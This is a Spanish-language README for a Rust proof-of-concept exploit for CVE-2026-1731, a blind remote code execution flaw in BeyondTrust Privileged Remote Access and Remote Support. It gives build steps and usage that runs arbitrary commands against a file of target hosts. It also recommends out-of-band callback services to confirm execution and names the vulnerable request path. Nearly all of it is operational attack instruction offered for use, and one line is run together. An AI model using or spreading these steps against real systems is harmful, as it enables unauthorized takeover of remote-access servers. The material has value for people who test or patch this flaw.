
Prueba de concepto de exploit para CVE-2026-1731, una RCE ciega en BeyondTrust Privileged Remote Access y Remote Support, que permite la ejecución remota de comandos en versiones vulnerables.
Para más información, te recomiendo leer el análisis de attackerkb.com.
Necesitarás las siguientes herramientas para compilar este PoC: Git, rust
git clone https://github.com/jakubie07/CVE-2026-1731.git
cd CVE-2026-1731
cargo build --release
CVE-2026-1731 estará ubicado en target/releasecd target/release
chmod +x ./CVE-2026-1731
./CVE-2026-1731 -h
cd target/release
./CVE-2026-1731.exe -h
Puedes ejecutar ./CVE-2026-1731 -h para ver una lista de opciones disponibles
./CVE-2026-1731 --targets targets.txt --command "whoami"
Nota: Dado que CVE-2026-1731 es una RCE ciega, no hay ninguna respuesta enviada por el host que pueda usarse como indicador de vulnerabilidad. Una solicitud puede ser exitosa, pero un objetivo que no sea vulnerable no activará la RCE. Se recomienda usar un servicio como webhook.site o PortSwigger's Burp Collaborator para probar contra objetivos. El éxito o fracaso en este PoC se basa en si el servidor responde con un código de estado 200 o no.
GET /get_rdf?comp=sdcust&locale_code=en-us.